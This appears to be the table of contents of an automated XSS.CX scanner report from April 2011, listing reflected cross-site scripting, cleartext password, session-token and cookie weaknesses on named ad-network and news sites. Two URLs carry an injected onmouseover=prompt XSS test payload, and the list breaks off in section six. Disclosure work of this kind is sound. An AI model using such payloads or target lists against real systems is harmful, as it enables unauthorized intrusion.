XSS, DORK Report, Cross Site Scripting Report for April 12, 2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Tue Apr 12 10:38:19 CDT 2011.


Loading

1. Cross-site scripting (reflected)

1.1. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [REST URL parameter 2]

1.2. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [REST URL parameter 3]

1.3. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [name of an arbitrarily supplied request parameter]

1.4. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [sz parameter]

1.5. http://a.rfihub.com/sed [pa parameter]

1.6. http://ad.doubleclick.net/adi/fnc/root/stocksearch [name of an arbitrarily supplied request parameter]

1.7. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [name of an arbitrarily supplied request parameter]

1.8. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [name of an arbitrarily supplied request parameter]

1.9. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [sz parameter]

1.10. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [sz parameter]

1.11. http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010 [net parameter]

1.12. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/detail [REST URL parameter 3]

1.13. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/index [REST URL parameter 3]

1.14. http://ad.doubleclick.net/adj/ibs.pla.homepage/local [kw parameter]

1.15. http://ad.doubleclick.net/adj/ibs.pla.homepage/local [name of an arbitrarily supplied request parameter]

1.16. http://ad.doubleclick.net/adj/ibs.pla.news/local [kw parameter]

1.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [REST URL parameter 2]

1.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [REST URL parameter 3]

1.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [click parameter]

1.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [name of an arbitrarily supplied request parameter]

1.21. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

1.22. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

1.23. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

1.24. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

1.25. http://admeld.adnxs.com/usersync [admeld_callback parameter]

1.26. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

1.27. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

1.28. http://ads.adap.tv/beacons [callback parameter]

1.29. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]

1.30. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

1.31. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

1.32. http://ads.adbrite.com/adserver/vdi/712156 [REST URL parameter 3]

1.33. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

1.34. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]

1.35. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]

1.36. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

1.37. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

1.38. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

1.39. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

1.40. http://ads.pointroll.com/PortalServe/ [flash parameter]

1.41. http://ads.pointroll.com/PortalServe/ [r parameter]

1.42. http://ads.pointroll.com/PortalServe/ [redir parameter]

1.43. http://ads.pointroll.com/PortalServe/ [time parameter]

1.44. http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter]

1.45. http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter]

1.46. http://adserving.cpxinteractive.com/st [ad_size parameter]

1.47. http://adserving.cpxinteractive.com/st [section parameter]

1.48. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpt parameter]

1.49. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpvc parameter]

1.50. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [name of an arbitrarily supplied request parameter]

1.51. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

1.52. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

1.53. http://api.kickapps.com/rest/comments/62976 [callback parameter]

1.54. http://api.zap2it.com/tvlistings/ZCShowtimeAction.do [aid parameter]

1.55. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.56. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.57. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.58. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.59. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.60. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.61. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.62. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.63. http://bh.contextweb.com/bh/sync/admeld [admeld_adprovider_id parameter]

1.64. http://bh.contextweb.com/bh/sync/admeld [admeld_callback parameter]

1.65. http://clientapps.kickapps.com/hearst/articleTitles.php [as parameter]

1.66. http://clientapps.kickapps.com/hearst/articleTitles.php [divName parameter]

1.67. http://clientapps.kickapps.com/hearst/articleTitles.php [lSize parameter]

1.68. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [dName parameter]

1.69. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [dName parameter]

1.70. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [id parameter]

1.71. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [pSize parameter]

1.72. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [tzAbbr parameter]

1.73. http://clientapps.kickapps.com/hearst/comments/start.php [id parameter]

1.74. http://clientapps.kickapps.com/hearst/comments/start.php [tzAbbr parameter]

1.75. http://d7.zedo.com/jsc/d3/fl.js [l parameter]

1.76. http://d7.zedo.com/jsc/d3/fl.js [l parameter]

1.77. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js [l parameter]

1.78. http://ds.addthis.com/red/psi/sites/www.ingeniux.com/p.json [callback parameter]

1.79. http://ds.addthis.com/red/psi/sites/www.marqui.com/p.json [callback parameter]

1.80. http://ds.addthis.com/red/psi/sites/www.wcax.com/p.json [callback parameter]

1.81. http://ib.adnxs.com/ab [cnd parameter]

1.82. http://ib.adnxs.com/ab [referrer parameter]

1.83. http://ib.adnxs.com/ab [tt_code parameter]

1.84. http://ib.adnxs.com/ptj [redir parameter]

1.85. http://js.revsci.net/gateway/gw.js [csid parameter]

1.86. http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010 [REST URL parameter 2]

1.87. http://lfov.net/webrecorder/g/chimera.js [vid parameter]

1.88. http://nmp.newsgator.com/NGBuzz/buzz.ashx [_dsrId parameter]

1.89. http://nmp.newsgator.com/NGBuzz/buzz.ashx [buzzId parameter]

1.90. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]

1.91. http://pixel.adsafeprotected.com/jspix [anId parameter]

1.92. http://pixel.adsafeprotected.com/jspix [campId parameter]

1.93. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

1.94. http://pixel.adsafeprotected.com/jspix [pubId parameter]

1.95. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

1.96. http://r.turn.com/server/pixel.htm [fpid parameter]

1.97. http://r.turn.com/server/pixel.htm [sp parameter]

1.98. http://studio-5.financialcontent.com/worldnow [Module parameter]

1.99. http://studio-5.financialcontent.com/worldnow [REST URL parameter 1]

1.100. http://studio-5.financialcontent.com/worldnow [name of an arbitrarily supplied request parameter]

1.101. http://ulocal.wptz.com/service/isUserLoggedIn.kickAction [callback parameter]

1.102. http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter]

1.103. http://um.simpli.fi/am_js.js [admeld_callback parameter]

1.104. http://um.simpli.fi/am_match [admeld_adprovider_id parameter]

1.105. http://um.simpli.fi/am_match [admeld_callback parameter]

1.106. http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]

1.107. http://um.simpli.fi/am_redirect_js [admeld_callback parameter]

1.108. http://video.foxnews.com/v/feed/video/4636974.js [callback parameter]

1.109. http://video.foxnews.com/v/feed/video/4637817.js [callback parameter]

1.110. http://video.foxnews.com/v/feed/video/4637903.js [callback parameter]

1.111. http://video.foxnews.com/v/feed/video/4638065.js [callback parameter]

1.112. http://wcax.upickem.net/engine/Splash.aspx [name of an arbitrarily supplied request parameter]

1.113. http://wptz.placelocal.com/_js/ad.js.php [adWidth parameter]

1.114. http://wptz.placelocal.com/_js/scriptloader.js.php [loadedparam parameter]

1.115. http://wptz.placelocal.com/_js/scriptloader.js.php [name of an arbitrarily supplied request parameter]

1.116. http://wptz.placelocal.com/_js/scriptloader.js.php [suffix parameter]

1.117. http://www.internetrix.net/action/event_signup/1066 [REST URL parameter 1]

1.118. http://www.internetrix.net/captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png [REST URL parameter 1]

1.119. http://www.internetrix.net/captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png [REST URL parameter 2]

1.120. http://www.internetrix.net/cgi-bin/ajax/utm_vars.cgi [REST URL parameter 1]

1.121. http://www.internetrix.net/favicon.ico [REST URL parameter 1]

1.122. http://www.internetrix.net/flash/video.swf [REST URL parameter 1]

1.123. http://www.internetrix.net/flash/video.swf [REST URL parameter 2]

1.124. http://www.internetrix.net/freestyle/optimizer [REST URL parameter 1]

1.125. http://www.internetrix.net/freestyle/optimizer [REST URL parameter 2]

1.126. http://www.internetrix.net/general.css [REST URL parameter 1]

1.127. http://www.internetrix.net/optimizer.html [REST URL parameter 1]

1.128. http://www.internetrix.net/page/accreditations/ [REST URL parameter 1]

1.129. http://www.internetrix.net/page/accreditations/dbcde-panel-member/ [REST URL parameter 1]

1.130. http://www.internetrix.net/page/articles/ [REST URL parameter 1]

1.131. http://www.internetrix.net/page/articles/latest-news/ [REST URL parameter 1]

1.132. http://www.internetrix.net/page/articles/newsletters/ [REST URL parameter 1]

1.133. http://www.internetrix.net/page/contact-us/ [REST URL parameter 1]

1.134. http://www.internetrix.net/page/contact-us/jobs-at-internetrix/ [REST URL parameter 1]

1.135. http://www.internetrix.net/page/events/ [REST URL parameter 1]

1.136. http://www.internetrix.net/page/products/ [REST URL parameter 1]

1.137. http://www.mvtimes.com/marthas-vineyard/article.php [id parameter]

1.138. http://www.mvtimes.com/marthas-vineyard/article.php [name of an arbitrarily supplied request parameter]

1.139. http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E [REST URL parameter 4]

1.140. http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E [name of an arbitrarily supplied request parameter]

1.141. http://www.wcax.com/Global/link.asp [name of an arbitrarily supplied request parameter]

1.142. http://www.wcax.com/global/interface/httprequest/hrproxy.asp [url parameter]

1.143. http://www.wcax.com/global/link.asp [function parameter]

1.144. http://www.wcax.com/global/link.asp [mode parameter]

1.145. http://www.wcax.com/global/link.asp [referrer parameter]

1.146. http://y.cdn.adblade.com/imps.php [name of an arbitrarily supplied request parameter]

1.147. http://y.cdn.adblade.com/imps.php [tpUrl parameter]

1.148. http://adserving.cpxinteractive.com/st [Referer HTTP header]

1.149. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

1.150. http://bh.contextweb.com/bh/sync/admeld [V cookie]

1.151. http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010 [cli cookie]

1.152. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom [meld_sess cookie]

1.153. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom [meld_sess cookie]

1.154. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros [meld_sess cookie]

1.155. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros [meld_sess cookie]

1.156. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics [meld_sess cookie]

1.157. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics [meld_sess cookie]

1.158. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros [meld_sess cookie]

1.159. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros [meld_sess cookie]

1.160. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros [meld_sess cookie]

1.161. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros [meld_sess cookie]

1.162. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros [meld_sess cookie]

1.163. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros [meld_sess cookie]

2. Flash cross-domain policy

2.1. http://fls.doubleclick.net/crossdomain.xml

2.2. http://segment-pixel.invitemedia.com/crossdomain.xml

2.3. http://feeds.bbci.co.uk/crossdomain.xml

2.4. http://googleads.g.doubleclick.net/crossdomain.xml

2.5. http://newsrss.bbc.co.uk/crossdomain.xml

3. Cleartext submission of password

3.1. http://appointron.com/login

3.2. http://appointron.com/users/new

3.3. http://wcax.upickem.net/engine/Splash.aspx

3.4. http://www.vermontopia.com/favicon.ico

3.5. http://www.wcax.com/global/PM/registration.asp

4. Session token in URL

4.1. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php

4.2. http://nmp.newsgator.com/NGBuzz/buzz.ashx

4.3. https://www.google.com/accounts/Captcha

4.4. https://www.google.com/accounts/NewAccount

4.5. http://www.wptz.com/index.html

5. Cookie scoped to parent domain

5.1. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json

5.2. http://api.twitter.com/1/WCAX_Dan%20/lists/wcaxnews/statuses.json

5.3. http://a.rfihub.com/cm

5.4. http://a.rfihub.com/cm

5.5. http://a.rfihub.com/sed

5.6. http://a.rfihub.com/tk.gif

5.7. http://a1.interclick.com/ColDta.aspx

5.8. http://ad.afy11.net/ad

5.9. http://ad.doubleclick.net/adj/wn.loc.wcax/political

5.10. http://ad.turn.com/server/ads.js

5.11. http://admeld.adnxs.com/usersync

5.12. http://admeld.lucidmedia.com/clicksense/admeld/match

5.13. http://ads.adap.tv/beacons

5.14. http://ads.adap.tv/cookie

5.15. http://ads.adbrite.com/adserver/vdi/682865

5.16. http://ads.adbrite.com/adserver/vdi/684339

5.17. http://ads.adbrite.com/adserver/vdi/712156

5.18. http://ads.adbrite.com/adserver/vdi/742697

5.19. http://ads.adbrite.com/adserver/vdi/762701

5.20. http://ads.adbrite.com/adserver/vdi/779045

5.21. http://ads.pointroll.com/PortalServe/

5.22. http://ads.revsci.net/adserver/ako

5.23. http://ads2.adbrite.com/v0/ad

5.24. http://adx.adnxs.com/mapuid

5.25. http://ak1.abmr.net/is/content.yieldmanager.com

5.26. http://ak1.abmr.net/is/tag.admeld.com

5.27. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5

5.28. http://api.bizographics.com/v1/profile.redirect

5.29. http://b.scorecardresearch.com/b

5.30. http://bcp.crwdcntrl.net/4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr

5.31. http://bcp.crwdcntrl.net/4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr

5.32. http://bcp.crwdcntrl.net/4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr

5.33. http://bcp.crwdcntrl.net/4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr

5.34. http://bcp.crwdcntrl.net/4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr

5.35. http://bcp.crwdcntrl.net/4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr

5.36. http://bcp.crwdcntrl.net/4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr

5.37. http://bcp.crwdcntrl.net/4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr

5.38. http://bcp.crwdcntrl.net/4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr

5.39. http://bcp.crwdcntrl.net/4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr

5.40. http://bcp.crwdcntrl.net/4/c=492%7Crand=622721104%7Cpv=y%7Crt=ifr

5.41. http://bcp.crwdcntrl.net/4/c=492%7Crand=624837915%7Cpv=y%7Crt=ifr

5.42. http://bcp.crwdcntrl.net/4/c=492%7Crand=708673296%7Cpv=y%7Crt=ifr

5.43. http://bcp.crwdcntrl.net/4/c=492%7Crand=759762185%7Cpv=y%7Crt=ifr

5.44. http://bcp.crwdcntrl.net/4/c=492%7Crand=769353744%7Cpv=y%7Crt=ifr

5.45. http://bcp.crwdcntrl.net/4/c=492%7Crand=770680268%7Cpv=y%7Crt=ifr

5.46. http://bcp.crwdcntrl.net/4/c=492%7Crand=775566438%7Cpv=y%7Crt=ifr

5.47. http://bcp.crwdcntrl.net/4/c=492%7Crand=827998426%7Cpv=y%7Crt=ifr

5.48. http://bcp.crwdcntrl.net/4/c=492%7Crand=939941480%7Cpv=y%7Crt=ifr

5.49. http://bcp.crwdcntrl.net/4/c=492%7Crand=996397162%7Cpv=y%7Crt=ifr

5.50. http://bh.contextweb.com/bh/rtset

5.51. http://bh.contextweb.com/bh/sync/admeld

5.52. http://bs.serving-sys.com/BurstingPipe/adServer.bs

5.53. http://cf.addthis.com/red/p.json

5.54. http://cspix.media6degrees.com/orbserv/hbpix

5.55. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4608069584519221037

5.56. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4608069584519221037

5.57. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4608069584519221037

5.58. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4608069584519221037

5.59. http://d.p-td.com/r/dt/id/L21rdC80L21waWQvMTgwNDg2NA/mpuid/4d97b063-cd55-fcc9-f79b-3dc3c331fd5b

5.60. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js

5.61. http://data.adsrvr.org/map/cookie/google

5.62. http://ds.addthis.com/red/psi/sites/www.ingeniux.com/p.json

5.63. http://ds.addthis.com/red/psi/sites/www.marqui.com/p.json

5.64. http://h.zedo.com/init/0.4907234441488981/g.gif

5.65. http://h.zedo.com/init/0.6948210536502302/g.gif

5.66. http://ib.adnxs.com/ab

5.67. http://ib.adnxs.com/click/4XoUrkfh9j_hehSuR-H2PwAAAMDMzAhAexSuR-H6EUB7FK5H4foRQGyzTtWol9w48f5MdWfsOnh2bqRNAAAAABUbAAC1AAAANQEAAAIAAADXfgQA0WMAAAEAAABVU0QAVVNEACwB-gC1GHIAoA8BAQUCAAQAAAAAuSbBxwAAAAA./cnd=!aBajcAjsLBDX_REYACDRxwEocjFmZmY-4foRQEITCAAQABgAIAEo_v__________AUgAUABYtTFgAGi1Ag../referrer=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fon-island.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DByl0zdm6kTf_uL83P6Aa8svGiCu_675oCp439xBrv8I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01NTk3ODc1MDQ2NTQwODA5sgEPd3d3Lm12dGltZXMuY29tugEKMzAweDI1MF9hc8gBCdoBNWh0dHA6Ly93d3cubXZ0aW1lcy5jb20vbWFydGhhcy12aW5leWFyZC9vbi1pc2xhbmQucGhwmAKWC8ACBMgCq4KlDqgDAegDsCroA7II9QMABABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtzEpohHrVWeJEJyiZUS6oseA0vyiQ%26client%3Dca-pub-5597875046540809%26adurl%3Dhttp://www.kwanzoo.com/widget/customized/2858/load

5.68. http://ib.adnxs.com/getuid

5.69. http://ib.adnxs.com/getuidu

5.70. http://ib.adnxs.com/if

5.71. http://ib.adnxs.com/mapuid

5.72. http://ib.adnxs.com/ptj

5.73. http://ib.adnxs.com/ptj

5.74. http://ib.adnxs.com/ptj

5.75. http://ib.adnxs.com/pxj

5.76. http://ib.adnxs.com/seg

5.77. http://ib.adnxs.com/setuid

5.78. http://id.google.com/verify/EAAAAB6lkOs5u81YRTwCEWoG6wY.gif

5.79. http://id.google.com/verify/EAAAAPvBCy6A6JaBSsfQHfS92x4.gif

5.80. http://image2.pubmatic.com/AdServer/Pug

5.81. http://insight.adsrvr.org/track/conv

5.82. http://js.revsci.net/gateway/gw.js

5.83. http://leadback.advertising.com/adcedge/lb

5.84. http://load.exelator.com/load/

5.85. http://loadm.exelator.com/load/

5.86. http://m.adnxs.com/msftcookiehandler

5.87. http://metrics.foxnews.com/b/ss/foxnews/1/H.20.3/s57025025668554

5.88. http://odb.outbrain.com/utils/get

5.89. http://odb.outbrain.com/utils/ping.html

5.90. http://pix04.revsci.net/D08734/a1/0/0/0.gif

5.91. http://pix04.revsci.net/E05510/b3/0/3/1003161/184358339.js

5.92. http://pix04.revsci.net/E05510/b3/0/3/1003161/317116761.js

5.93. http://pix04.revsci.net/E05510/b3/0/3/1003161/411477495.js

5.94. http://pix04.revsci.net/E05510/b3/0/3/1003161/564853216.js

5.95. http://pix04.revsci.net/E05510/b3/0/3/1003161/695826942.js

5.96. http://pix04.revsci.net/E05510/b3/0/3/1003161/737002840.js

5.97. http://pix04.revsci.net/E05510/b3/0/3/1003161/779915473.js

5.98. http://pix04.revsci.net/E05510/b3/0/3/1003161/794483737.js

5.99. http://pix04.revsci.net/E05510/b3/0/3/1003161/79844803.js

5.100. http://pix04.revsci.net/E05510/b3/0/3/1003161/844383816.js

5.101. http://pix04.revsci.net/E05510/b3/0/3/1003161/846854188.js

5.102. http://pix04.revsci.net/E05511/a4/0/0/pcx.js

5.103. http://pix04.revsci.net/E05511/b3/0/3/0902121/10608952.js

5.104. http://pix04.revsci.net/E05511/b3/0/3/0902121/135299998.js

5.105. http://pix04.revsci.net/E05511/b3/0/3/0902121/209148801.js

5.106. http://pix04.revsci.net/E05511/b3/0/3/0902121/21225103.js

5.107. http://pix04.revsci.net/E05511/b3/0/3/0902121/281102501.js

5.108. http://pix04.revsci.net/E05511/b3/0/3/0902121/285224161.js

5.109. http://pix04.revsci.net/E05511/b3/0/3/0902121/316223818.js

5.110. http://pix04.revsci.net/E05511/b3/0/3/0902121/354226275.js

5.111. http://pix04.revsci.net/E05511/b3/0/3/0902121/64495114.js

5.112. http://pix04.revsci.net/E05511/b3/0/3/0902121/695595891.js

5.113. http://pix04.revsci.net/E05511/b3/0/3/0902121/699418016.js

5.114. http://pix04.revsci.net/E05511/b3/0/3/0902121/700224037.js

5.115. http://pix04.revsci.net/E05511/b3/0/3/0902121/71706519.js

5.116. http://pix04.revsci.net/E05511/b3/0/3/0902121/734832866.js

5.117. http://pix04.revsci.net/E05511/b3/0/3/0902121/73563402.js

5.118. http://pix04.revsci.net/E05511/b3/0/3/0902121/806386945.js

5.119. http://pix04.revsci.net/E05511/b3/0/3/0902121/871550918.js

5.120. http://pix04.revsci.net/E05511/b3/0/3/0902121/914837697.js

5.121. http://pix04.revsci.net/E05511/b3/0/3/0902121/918432446.js

5.122. http://pixel.33across.com/ps/

5.123. http://pixel.invitemedia.com/adnxs_sync

5.124. http://pixel.quantserve.com/pixel

5.125. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

5.126. http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif

5.127. http://pixel.quantserve.com/seg/p-ddEiIs2qFSY46.js

5.128. http://pixel.rubiconproject.com/tap.php

5.129. http://r.openx.net/set

5.130. http://r.turn.com/r/bd

5.131. http://r.turn.com/r/beacon

5.132. http://r.turn.com/server/pixel.htm

5.133. http://r1-ads.ace.advertising.com/ctst=1/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

5.134. http://r1-ads.ace.advertising.com/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

5.135. http://segment-pixel.invitemedia.com/pixel

5.136. http://segment-pixel.invitemedia.com/unpixel

5.137. http://segments.adap.tv/data

5.138. http://segments.adap.tv/data/

5.139. http://server.iad.liveperson.net/hc/47227738/

5.140. http://sync.adap.tv/sync

5.141. http://sync.mathtag.com/sync/img

5.142. http://sync.tidaltv.com/adaptv.ashx

5.143. http://tacoda.at.atwola.com/rtx/r.js

5.144. http://tags.bluekai.com/ids

5.145. http://tags.bluekai.com/site/2174

5.146. http://tags.bluekai.com/site/2731

5.147. http://tags.bluekai.com/site/668

5.148. http://vlog.leadforce1.com/bf/bf.php

5.149. http://www.valtira.com/gwo

5.150. http://www.wesh.com/images/structures/misc/play_overlay_small.png

5.151. http://www.wmur.com/images/structures/tabs/sponsor_tile_transparent.png

5.152. http://www.wptz.com/

5.153. http://www.wtp101.com/ab_sync

5.154. http://xcdn.xgraph.net/15530/db/xg.gif

5.155. http://y.cdn.adblade.com/imps.php

6. Cookie without HttpOnly flag set

6.1. http://affiliate.kickapps.com/service/getWidget.kickAction

6.2. http://kellwood.com/

6.3. http://pixel.adsafeprotected.com/jspix

6.4. http://provideby.com/show_dynamic/coupon/livingsocial-fnews/300x250-POL/

6.5. http://s.clickability.com/s

6.6. http://t3.trackalyzer.com/trackalyze.asp

6.7. http://trc.taboolasyndication.com/hearst-wptz/trc/2/json

6.8. http://ulocal.wptz.com/service/isUserLoggedIn.kickAction

6.9. http://valtira.com/

6.10. http://www.clickability.com/

6.11. http://www.clickability.com/crossdomain.xml

6.12. http://www.clickability.com/googlewotep

6.13. http://www.clickability.com/templates/Corp_Scripts_Template.js

6.14. http://www.clickability.com/templates/browser.js

6.15. http://www.clickability.com/templates/clk_dbtemp_main.css

6.16. http://www.clickability.com/templates/popovers.js

6.17. http://www.clickability.com/templates/swfobject.js

6.18. http://www.mvtimes.com/marthas-vineyard/directory/

6.19. http://www.valtira.com/gwo

6.20. http://www.vermontopia.com/

6.21. http://69.16.184.116/v8u2m5i8/cds/tags2/4-1007209.js

6.22. http://a.rfihub.com/cm

6.23. http://a.rfihub.com/cm

6.24. http://a.rfihub.com/sed

6.25. http://a.rfihub.com/tk.gif

6.26. http://a1.interclick.com/ColDta.aspx

6.27. http://a1.interclick.com/getInPageJSProcess.aspx

6.28. http://ad.afy11.net/ad

6.29. http://ad.doubleclick.net/adj/wn.loc.wcax/political

6.30. http://ad.turn.com/server/ads.js

6.31. http://ad.yieldmanager.com/iframe3

6.32. http://ad.yieldmanager.com/iframe3

6.33. http://ad.yieldmanager.com/imp

6.34. http://ad.yieldmanager.com/pixel

6.35. http://ad.yieldmanager.com/unpixel

6.36. http://admeld.lucidmedia.com/clicksense/admeld/match

6.37. http://admonkey.dapper.net/AdBriteUIDMonster

6.38. http://ads.adap.tv/beacons

6.39. http://ads.adap.tv/cookie

6.40. http://ads.adbrite.com/adserver/vdi/682865

6.41. http://ads.adbrite.com/adserver/vdi/684339

6.42. http://ads.adbrite.com/adserver/vdi/712156

6.43. http://ads.adbrite.com/adserver/vdi/742697

6.44. http://ads.adbrite.com/adserver/vdi/762701

6.45. http://ads.adbrite.com/adserver/vdi/779045

6.46. http://ads.financialcontent.com/www/delivery/afr.php

6.47. http://ads.financialcontent.com/www/delivery/lg.php

6.48. http://ads.pointroll.com/PortalServe/

6.49. http://ads.revsci.net/adserver/ako

6.50. http://ads2.adbrite.com/v0/ad

6.51. http://affiliate.kickapps.com/crossdomain.xml

6.52. http://ak1.abmr.net/is/content.yieldmanager.com

6.53. http://ak1.abmr.net/is/tag.admeld.com

6.54. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5

6.55. http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/dcs.gif

6.56. http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/dcs.gif

6.57. http://api.bizographics.com/v1/profile.redirect

6.58. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json

6.59. http://ar.atwola.com/atd

6.60. http://b.scorecardresearch.com/b

6.61. http://bcp.crwdcntrl.net/4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr

6.62. http://bcp.crwdcntrl.net/4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr

6.63. http://bcp.crwdcntrl.net/4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr

6.64. http://bcp.crwdcntrl.net/4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr

6.65. http://bcp.crwdcntrl.net/4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr

6.66. http://bcp.crwdcntrl.net/4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr

6.67. http://bcp.crwdcntrl.net/4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr

6.68. http://bcp.crwdcntrl.net/4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr

6.69. http://bcp.crwdcntrl.net/4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr

6.70. http://bcp.crwdcntrl.net/4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr

6.71. http://bcp.crwdcntrl.net/4/c=492%7Crand=622721104%7Cpv=y%7Crt=ifr

6.72. http://bcp.crwdcntrl.net/4/c=492%7Crand=624837915%7Cpv=y%7Crt=ifr

